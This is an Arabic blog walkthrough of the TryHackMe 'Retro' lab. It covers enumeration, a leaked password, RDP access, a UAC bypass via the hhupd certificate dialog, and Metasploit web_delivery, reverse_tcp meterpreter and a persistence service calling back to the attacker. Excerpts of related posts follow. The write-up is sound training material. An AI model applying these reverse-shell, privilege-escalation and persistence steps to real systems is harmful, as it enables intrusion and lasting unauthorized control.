كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـIP للمشين حقتكم على TryHackMe
أول حاجة نشغل الـmachine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap
sudo nmap IP -vv
طلع معانا بورتين وهي 80 و 3389، نرجع نسوي Aggressive سكان على نفس هذه البورتات
sudo nmap IP -vv -A -p 80,3389
بورت 80 عليها Microsoft web server والـ http title هو IIS Windows Server، و بورت 3389 عليها RDP واسم الجهاز RETROWEB.
إذا زرنا الصفحة على المتصفح، بنلقى الصفحة الرئيسية لـmicrosoft web server وما فيها شيء مهم، فبنسوي directory enumeration باستخدام gobuster
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u htttp://IP/ -t 64
هذه القائمة للمسارات ما طلعت معانا شيء، فبنستخدم وحده ثانية
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u htttp://IP/ -t 64
طلع معانا المسار retro، إذا رحنا للمتصفح وزرنا الصفحة، بنلاقي بلوق فيها بوستات عن الألعاب، والمُستخدم اللي كاتب هذه البوستات هو wade.
إذا ضغطنا على اسم wade بيفتح معانا صفحة البروفايل له، ثم في القائمة اللي على اليمين بالأسفل تحت META بنلاقي Commnets RSS، لو ضغطنا عليها بيتحمل معانا ملف، إذا دخلنا على الملف وشفنا محتوياته بنلقى كلمة السر بداخله
الحين بما إن عندي اسم مستخدم wade وكلمة سر، فنستخدمهم عشان نسجل دخول على نظام الضحية باستخدام RDP
هذا يخلي الحافظة مشتركة بيننا وبين التارقيت، وبكذا أي شيء أنسخة من جهازي تلقائي ينتقل للحافظة في الضحية، والعكس صحيح.
/dynamic-resolution
هذا يخلي الوضوح أفضل
/drive:/tmp,share
هذا يخلي بيني وبين الضحية ملف مشترك، وأنا هنا اخترت tmp، ممكن تختارون أي شيء، وبكذا أي ملف أنقله لـtmp تلقائي بيروح للضحية. وهذا يسهل جدا جدا نقل الملفات بين الجهازين.
أول ما ندخل على النظام بنلقى اليوزر فلاق على سطح المكتب ✨.
بعد كذا نبدأ في الجزء الثاني من الحل وهو استغلال البايناري اللي موجود على سطح المكتب حتى نحصل على shell. أول حاجة نضغط بزر الفأرة الأيمن على البايناري واسمه hhupd، ثم نختار open، ثم بيطلع لنا نافذة UAC، يطلب كلمة سر، نضغط على Show more details، ثم نضغط على show information about the publisher's certificate، بيفتح نافذة Microsoft Corperation، ثم من عند issued by نضغط على الرابط، ونضغط عليه أكثر من مرة عشان نتأكد إن فيه نافذة متصفح انفتحت فعلا.
نضغط على ok ثم No، إذا رجعنا لسطح المكتب بنلقى إنه انفتحت معانا نوافذ في المتصفح، نضغط على أي وحده منها ثم من الكيبورد ctrl + S عشان أحفظها عندي، ثم بيطلع معانا error حطو ok وتجاهلوه، بعدين في خانة البحث بالأعلى نبحث عن cmd ونضغط enter وعلطول بيفتح معانا administrator's cmd
cd c:\\Users\Administrator\Desktop
type root.txt
وبكذا حصلنا على الرووت فلاق ✨. اللي باقي نبغاه هو إننا نحصل على وصول مستمر للجهاز، الحين لو تقفل هذا الجهاز، لازم نرجع نتصل ونسوي الخطوات ذي من أول وجديد، برضو ممكن المستخدم يحذف الملف اللي على سطح المكتب وبكذا معاد يمدينا نحصل على administrator cmd، أو ممكن من الأساس يغير المستخدم كلمة السر، وبكذا بيقفل علينا تماما.
لذلك بنستخدم module على metasploit اسمها web_delivery نحصل من خلالها على meterpreter session، وهذه أول خطوة.
ثاني خطوة نستخدم module اسمها persistence_service، اللي بتسويه إنها بتسوي service على الجهاز تشتغل مع الجهاز أول ما يشتغل يعني في الـbooting، فيصير لو فقدنا الاتصال وطفى جهاز الضحية، مجرد ما يشتغل بتبدأ هذه الخدمة مره ثانية وتتصل فيني.
اللي علي إني لازم أكون مجهزة listener يستقبل الاتصال، وهذه هي ثالث خطوة.
أول شيء نشغل Metasploit
msfconsole
search web_delivery
use 2
set payload windows/meterpreter/reverse_tcp
set target PSH
PSH يعني PowerShell بما إن الجهاز ويندوز
set lhost tun0
tun0 تُشير إلى عنوان openVPN
run
بيطبع لنا كوماند طويلة، ننسخها ونرجع على التارقيت ونصلقها في الـcmd اللي بصلاحيات الـadministrator ثم نضغط enter، وعلطول بيوصل لنا اتصال على جهازنا وتفتح معانا meterpreter session. وهذه أول خطوة انتهينا منها.
الحين بنسوي خدمة
use persistence_service
set session 2
set lport 1234
set lhost tun 0
run
الحين صار عندنا خدمة اسمها RKLQ على نظام الضحية تشتغل معاه كل ما اشتغل، وبكذا يكون انتهينا من ثاني خطوة.
آخر خطوة هو إننا نجهز الـlistener باستخدام
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set lport 1234
لازم نتأكد هنا إن رقم البورت يكون نفس رقم البورت اللي حطيناه في الـpersistence service وبرضو البايلود يكون نفسه، الحين كل شيء جاهز في حالة لو تقفل جهاز الضحية، هو من نفسه بيرجع يتصل فيني.
لو رجعتوا لصفحة الشرح، هو استخدم فقط الـmeterpreter command وهي run persistence -X، والمفروض إنها تسوي خدمة وتسوي نفس الشغل اللي سوته الـmodule persistence service، لكنها نهائي ما اشتغلت معاي، فاستخدمت هذه الطريقة اللي شرحتها بالأعلى، عموما كلها صح، اللي تستخدمونها منها أيًّا كان المفروض يضبط.
بسم الله اللي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب على هذا الرابط: رابط التحدي: https://tryhackme.com/r/room/blog ==================================================== كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـIP للمشين حقتكم على TryHackMe أول حاجة نشغل الـmachine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap sudo nmap IP -vv طلع معانا 4 بورتات، نرجع نسوي Aggressive سكان عليها sudo nmap IP -vv -A -p 22,80,139,445 على بورت 22 عندنا SSH ونظام التشغيل لجهاز الضحية هو Ubuntu، وعلى بورت 80 عندنا Apache server، أما بورت 139 و 445 متعلقة بالـsmb. برضو أعطانا في النتائج إن الـhttp generator هو WordPress وبرضو أعطانا رقم النسخة وهو 5.0، وهذه معلومة مفيدة ومهمة. إذا زرنا الصفحة على بورت 80 في المتصفح، بنلاقي بلوق للمستخدم Billy وفيها بوستات، ولكن ما بداخل هذه البوستات شيء مهم. و زي ما قال لنا في التحدي، بنضيف الموقع إلى ملف etc/hosts/ على الجهاز الحين بنستفيد من الـsmb على جهاز الض...
بسم الله الرحمن الرحيم اختبرت اختبار eJPTv2 والحمدلله حصلت على الشهادة. ← أول شيء، ايش تحتاجون من معرفة سابقة قبل ما تبدؤون الاختبار؟ تحتاجون معرفة بالشبكات ونظام لينكس ونظام ويندوز، في حالة ما كان عندكم معرفة فيها ما بيكفي الكورس اللي يجي مع الشهادة من وجهة نظري، كثير من المواضيع أو اللابات تفترض المعرفة السابقة بهالمواضيع. بالنسبة لويندوز ولينيكس مطلوب فهم التعامل مع النظام بال command line أهم شيء. أما الشبكات تحتاج تكونون فاهمينها كويس وطريقة عملها، لأن في الاختبار بينطلب pivoting وهو الانتقال لشبكة أخرى بواسطة جهاز وسيط تم اختراقه، هذه الخطوة تحتاج فهم جيد للشبكات. إذا كان معاكم معرفة بسيطة بهالمواضيع ممكن تبدؤون الكورس وخلال الدراسة لو في شيء جديد واجهكم تبحثون عنه، لكن إذا مافي معرفة سابقة أنصح بأخذ كورس لأي من النقاط اللي تحتاج منكم تطوير ثم البدء في الشهادة. ← ثاني شيء، كم أحتاج مدة عشان أحصل على الشهادة ؟ هذه نقطة مهمة 😊 ، المدة تختلف كثييييير لكل شخص ويؤثر عليها هل هذا الشخص سبق وحل تحديات ctf لأنها تعطي مهارة وتسهل بشكل كبير فهم الكورس، برضو تخت...
بسم الله للي يبغى يشوف الحل مشروح فيديو يرجع للفيديو على قناتي باليوتيوب على هذا الرابط: رابط التحدي: https://tryhackme.com/r/room/blueprint =========================================================== كلمة IP في كل الكوماندز اللي أكتبها تُستبدل بالـ IP للمشين حقتكم على TryHackMe أول حاجة نشغل الـ machine ونتأكد إننا اتصلنا بشبكة TryHackMe والاتصال مضبوط، بعدين نبدأ بأول خطوة للحل وهي إننا نسوي scan للشبكة باستخدام nmap sudo nmap IP -vv طلع معانا عدد كبير من البورتات، لكن بنترك البورتات اللي أرقامها كبيرة وبنركز على أول 7 بورتات، فنرجع نسوي Aggressive سكان عليها sudo nmap IP -vv -A -p 80,135,139,443,445,3306,8080 من خلال السكان عرفنا إن عندنا على بورت 8080 صفحة Index of نروح نزور الصفحة ونشوف الملفات اللي بداخلها، إذا رحنا للمتصفح على http://IP:8080 بنلاقي مجلد oscommerce-2.3.4 إذا ضغطنا عليه بيودينا على صفحة فيها مجلدين، نضغط على catalog وبيفتح معانا موقع تجارة إلكترونية ولكن أبدا مو مرتب وتعبان جدا، هذا يعطي احتمال إن هذه النسخة من هذا الموقع قديمة وعل...
Comments
Post a Comment